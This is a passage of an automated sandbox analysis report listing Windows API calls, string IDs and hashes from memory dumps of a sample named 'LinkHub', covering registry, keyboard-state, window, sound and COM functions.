                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                    • API String ID: 1939486746-1459072770
                                                                    • Opcode ID: 24f3b0d6c6636d8fc1789806702ed841369a8dae3047c3ecab2aba62d030f1c6
                                                                    • Instruction ID: c1364854ff290203c361275131cc19cc98f2d024874d58a649add43a56a88ea3
                                                                    • Opcode Fuzzy Hash: 24f3b0d6c6636d8fc1789806702ed841369a8dae3047c3ecab2aba62d030f1c6
                                                                    • Instruction Fuzzy Hash: 384104725002087EEF01BBA49C4BFBF776CEF55710F10005AFA05A6292FA74DA01A3B5
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00CFD6C4
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00CFD6ED
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00CFD7A8
                                                                      • Part of subcall function 00CFD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00CFD70A
                                                                      • Part of subcall function 00CFD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00CFD71D
                                                                      • Part of subcall function 00CFD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CFD72F
                                                                      • Part of subcall function 00CFD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00CFD765
                                                                      • Part of subcall function 00CFD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00CFD788
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CFD753
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2734957052-4033151799
                                                                    • Opcode ID: 8d84b6a234141a30d7ce59a2860385703f4f9065df72b4fd153184b3646d4bbc
                                                                    • Instruction ID: 9dda77fdfc1ca945744db1fd724290cf5689def68c1303fdc4755faa7dbafe80
                                                                    • Opcode Fuzzy Hash: 8d84b6a234141a30d7ce59a2860385703f4f9065df72b4fd153184b3646d4bbc
                                                                    • Instruction Fuzzy Hash: 8531847590121CBBD720AF90DC88EFFBB7DEF46710F000166B51AE7214DA709E459AB1
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 00CDEFCB
                                                                      • Part of subcall function 00C8F215: timeGetTime.WINMM(?,?,00CDEFEB), ref: 00C8F219
                                                                    • Sleep.KERNEL32(0000000A), ref: 00CDEFF8
                                                                    • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00CDF01C
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CDF03E
                                                                    • SetActiveWindow.USER32 ref: 00CDF05D
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CDF06B
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CDF08A
                                                                    • Sleep.KERNEL32(000000FA), ref: 00CDF095
                                                                    • IsWindow.USER32 ref: 00CDF0A1
                                                                    • EndDialog.USER32(00000000), ref: 00CDF0B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: 8e947e686ce8157dc67b6f4dccc2d155ff8b3058f64caf06b66bbc50067844be
                                                                    • Instruction ID: c192ca43a62c7660e65ebd070f6f8e9d8b8a373d7b75228b9123da0fa8fe96a1
                                                                    • Opcode Fuzzy Hash: 8e947e686ce8157dc67b6f4dccc2d155ff8b3058f64caf06b66bbc50067844be
                                                                    • Instruction Fuzzy Hash: 5F219279100305BFE7106FA4EC89B267B6AF756744F00402BF606D33B2CB719D459675
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CDF374
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CDF38A
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDF39B
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CDF3AD
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CDF3BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_wcslen
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 2420728520-1007645807
                                                                    • Opcode ID: b8368ed5447a3338532382adeb4449bf4320842b2d525ca33fcd2485fc101d3d
                                                                    • Instruction ID: f6aba2093c4531b480d1b51c7cbab79aaabb852f1b74e93c8cc4657fb48c61af
                                                                    • Opcode Fuzzy Hash: b8368ed5447a3338532382adeb4449bf4320842b2d525ca33fcd2485fc101d3d
                                                                    • Instruction Fuzzy Hash: 0811A371A902597DD730A365CC4AFFF7ABCEBD2B40F00052A7916E20E0DAA05D49D9B1
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00CDA9D9
                                                                    • SetKeyboardState.USER32(?), ref: 00CDAA44
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00CDAA64
                                                                    • GetKeyState.USER32(000000A0), ref: 00CDAA7B
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00CDAAAA
                                                                    • GetKeyState.USER32(000000A1), ref: 00CDAABB
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00CDAAE7
                                                                    • GetKeyState.USER32(00000011), ref: 00CDAAF5
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00CDAB1E
                                                                    • GetKeyState.USER32(00000012), ref: 00CDAB2C
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00CDAB55
                                                                    • GetKeyState.USER32(0000005B), ref: 00CDAB63
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 03576418502754de0d09ed9d7084b911179033c2f05caf69b471d7c2accec6b5
                                                                    • Instruction ID: 2bc7307e5580bdfbc05b7052b709bfd5d00b75eb0522182378860f8b2b6ab322
                                                                    • Opcode Fuzzy Hash: 03576418502754de0d09ed9d7084b911179033c2f05caf69b471d7c2accec6b5
                                                                    • Instruction Fuzzy Hash: CE51D770A047842AFB35D7B08854BEABFB59F02380F09459BC6D65A3C2DA549F4CCB63
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00CD6649
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00CD6662
                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00CD66C0
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00CD66D0
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00CD66E2
                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00CD6736
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00CD6744
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00CD6756
                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00CD6798
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00CD67AB
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CD67C1
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00CD67CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: 93ee64d6964e185798d3d382733042716eeb487522e2c0db8df67e8d3d537797
                                                                    • Instruction ID: aaa0b0a3f6908e906e0a4bbafa7339f7eb861516ba0058d10ba762652989cb82
                                                                    • Opcode Fuzzy Hash: 93ee64d6964e185798d3d382733042716eeb487522e2c0db8df67e8d3d537797
                                                                    • Instruction Fuzzy Hash: 3C51F171A00209AFDB14CFA8DD85AAEBBB5FB48314F514129F519E7394D7719E04CB60
                                                                    APIs
                                                                      • Part of subcall function 00C71802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C71488,?,00000000,?,?,?,?,00C7145A,00000000,?), ref: 00C71865
                                                                    • DestroyWindow.USER32(?), ref: 00C71521
                                                                    • KillTimer.USER32(00000000,?,?,?,?,00C7145A,00000000,?), ref: 00C715BB
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00CB29B4
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C7145A,00000000,?), ref: 00CB29E2
                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C7145A,00000000,?), ref: 00CB29F9
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C7145A,00000000), ref: 00CB2A15
                                                                    • DeleteObject.GDI32(00000000), ref: 00CB2A27
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 641708696-0
                                                                    • Opcode ID: 52b3144c5e27ae4e3425569406654dbbb927ac6c74810a59d053f9c45be37968
                                                                    • Instruction ID: 3f4f8d8ba8719d90b9fc2bffb196283e82bbb9b4e8616e62edbcb40e385a5068
                                                                    • Opcode Fuzzy Hash: 52b3144c5e27ae4e3425569406654dbbb927ac6c74810a59d053f9c45be37968
                                                                    • Instruction Fuzzy Hash: B761AF34504701DFDB3A8F18D848B3677B2FB81312F588519E89B96670C330AA80DF60
                                                                    APIs
                                                                      • Part of subcall function 00C72234: GetWindowLongW.USER32(?,000000EB), ref: 00C72242
                                                                    • GetSysColor.USER32(0000000F), ref: 00C72152
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: 1df3fb8387de25dc4405ce9ab49dbab3f48d5caa8e650242836350bc5e7c68d9
                                                                    • Instruction ID: 36b6ef6cd9f1ada958e1e188f68bd253e7f4c4c23586f08528a8cfe3412b1d76
                                                                    • Opcode Fuzzy Hash: 1df3fb8387de25dc4405ce9ab49dbab3f48d5caa8e650242836350bc5e7c68d9
                                                                    • Instruction Fuzzy Hash: D641A035100744AFDB245F689C48BBE3776BB46331F958255FABA8B2E1C7318E42DB21
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00CC0D31,00000001,0000138C,00000001,00000001,00000001,?,00CEEEAE,00D42430), ref: 00CDA091
                                                                    • LoadStringW.USER32(00000000,?,00CC0D31,00000001), ref: 00CDA09A
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00CC0D31,00000001,0000138C,00000001,00000001,00000001,?,00CEEEAE,00D42430,?), ref: 00CDA0BC
                                                                    • LoadStringW.USER32(00000000,?,00CC0D31,00000001), ref: 00CDA0BF
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CDA1E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 747408836-2268648507
                                                                    • Opcode ID: 137fb3803086f5fa82d0463c37118752cc9a6f2c44501ded5f7073483897737a
                                                                    • Instruction ID: e0a08ebcdccef8a79ecdde731561bf579b5bf0c2601c316a52b86b5808acf56a
                                                                    • Opcode Fuzzy Hash: 137fb3803086f5fa82d0463c37118752cc9a6f2c44501ded5f7073483897737a
                                                                    • Instruction Fuzzy Hash: 9141417280060DABCB14EBE0DD46EEEB778AF14300F504066F609B21A2DB756F49EB61
                                                                    APIs
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00CD1093
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00CD10AF
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00CD10CB
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00CD10F5
                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00CD111D
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CD1128
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CD112D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 323675364-22481851
                                                                    • Opcode ID: d87b622a8b608e99cf2d0f27cca6fce5a8779b07e883ca8ac098711df78a02cf
                                                                    • Instruction ID: 5fa90a8fd0001e4c0e418d2b36300c5b89a57ff6a2de447b43cd20d638a8f597
                                                                    • Opcode Fuzzy Hash: d87b622a8b608e99cf2d0f27cca6fce5a8779b07e883ca8ac098711df78a02cf
                                                                    • Instruction Fuzzy Hash: FB410A76C10229ABDF11EBA4DC459EEB778FF14750F44802AEA15A3260EB319E04DB60
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00D04AD9
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00D04AE0
                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00D04AF3
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00D04AFB
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D04B06
                                                                    • DeleteDC.GDI32(00000000), ref: 00D04B10
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00D04B1A
                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00D04B30
                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00D04B3C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                    • String ID: static
                                                                    • API String ID: 2559357485-2160076837
                                                                    • Opcode ID: 584502e597c2e8c0c8ab23053df635bed6901aaaa274548a3444150ba8ddf6e3
                                                                    • Instruction ID: fcb38b49b07e2c9d559d94292f053e5c82336e18edea853bc921ae950c093bfc
                                                                    • Opcode Fuzzy Hash: 584502e597c2e8c0c8ab23053df635bed6901aaaa274548a3444150ba8ddf6e3
                                                                    • Instruction Fuzzy Hash: 73313872100219ABDF119FA4DC08FDA3BAAEF0D324F150212FA59E62E0C775D860DBA4
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00CF46B9
                                                                    • CoInitialize.OLE32(00000000), ref: 00CF46E7
                                                                    • CoUninitialize.OLE32 ref: 00CF46F1
                                                                    • _wcslen.LIBCMT ref: 00CF478A
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00CF480E
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CF4932
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00CF496B
                                                                    • CoGetObject.OLE32(?,00000000,00D10B64,?), ref: 00CF498A
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00CF499D
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CF4A21
                                                                    • VariantClear.OLEAUT32(?), ref: 00CF4A35
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                    • String ID:
                                                                    • API String ID: 429561992-0
                                                                    • Opcode ID: dec386ed1ce53dedc175f9ca507d3847733218f66d1a462b414cf7c1f17fd046
                                                                    • Instruction ID: 86d0071b62c3508ff696f6ddd05b3029ef48ab2dd1df883fff197f36379386d8
                                                                    • Opcode Fuzzy Hash: dec386ed1ce53dedc175f9ca507d3847733218f66d1a462b414cf7c1f17fd046
                                                                    • Instruction Fuzzy Hash: 11C11271604305AFC744DF68C88492BBBE9EF89748F10491DFA999B250DB70ED45CB62
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 00CE8538
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CE85D4
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00CE85E8
                                                                    • CoCreateInstance.OLE32(00D10CD4,00000000,00000001,00D37E8C,?), ref: 00CE8634
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CE86B9
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00CE8711
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00CE879C
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CE87BF
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00CE87C6
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00CE881B
                                                                    • CoUninitialize.OLE32 ref: 00CE8821
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2762341140-0
                                                                    • Opcode ID: 871019c3aa1d86cce432510a94170b568c805128f5932bf18c4d93cbdb6d80c4
                                                                    • Instruction ID: e5a888ac25283a622d4b141e9d3c57c286bec954d9dfe5e229ae7841d6e66285
                                                                    • Opcode Fuzzy Hash: 871019c3aa1d86cce432510a94170b568c805128f5932bf18c4d93cbdb6d80c4
                                                                    • Instruction Fuzzy Hash: E5C1E875A00245AFDB14DFA5C888DAEBBF9EF48304B148499F519EB361DB30EE45CB90
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00CD039F
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00CD03F8
                                                                    • VariantInit.OLEAUT32(?), ref: 00CD040A
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CD042A
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00CD047D
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CD0491
                                                                    • VariantClear.OLEAUT32(?), ref: 00CD04A6
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00CD04B3
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CD04BC
                                                                    • VariantClear.OLEAUT32(?), ref: 00CD04CE
